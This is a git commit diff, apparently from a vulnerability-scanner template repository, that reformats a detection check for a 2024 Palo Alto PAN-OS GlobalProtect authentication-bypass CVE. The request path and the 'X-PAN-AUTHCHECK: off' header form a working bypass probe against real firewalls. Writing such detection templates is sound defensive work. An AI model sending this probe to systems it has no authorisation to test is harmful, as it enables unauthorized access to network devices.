added dsl & updated req type

patch-16
Ritik Chaddha 2024-11-20 10:09:50 +05:30 committed by GitHub
parent 83a4e8f59b
commit f1d108b593
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 14 additions and 24 deletions

View File

@ -19,6 +19,8 @@ info:
epss-percentile: 0.85843 epss-percentile: 0.85843
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
metadata: metadata:
verified: true
max-request: 1
vendor: paloaltonetworks vendor: paloaltonetworks
product: pan-os product: pan-os
fofa-query: icon_hash="-631559155" fofa-query: icon_hash="-631559155"
@ -28,29 +30,17 @@ info:
tags: cve,cve2024,paloalto,globalprotect,kev tags: cve,cve2024,paloalto,globalprotect,kev
http: http:
- method: GET - raw:
path: - |
- "{{BaseURL}}/php/ztp_gate.php/.js.map" GET /php/ztp_gate.php/.js.map HTTP/1.1
headers: Host: {{Hostname}}
X-PAN-AUTHCHECK: off X-PAN-AUTHCHECK: off
matchers-condition: and
matchers: matchers:
- type: word - type: dsl
words: dsl:
- "<title>Zero Touch Provisioning</title>" - 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
- "Zero Touch Provisioning (ZTP)" - 'contains(body, "/scripts/cache/mainui.javascript")'
- 'contains(header, "PHPSESSID=")'
- type: word - 'status_code == 200'
part: body condition: and
words:
- "/scripts/cache/mainui.javascript"
- type: word
part: header
words:
- "PHPSESSID="
- type: status
status:
- 200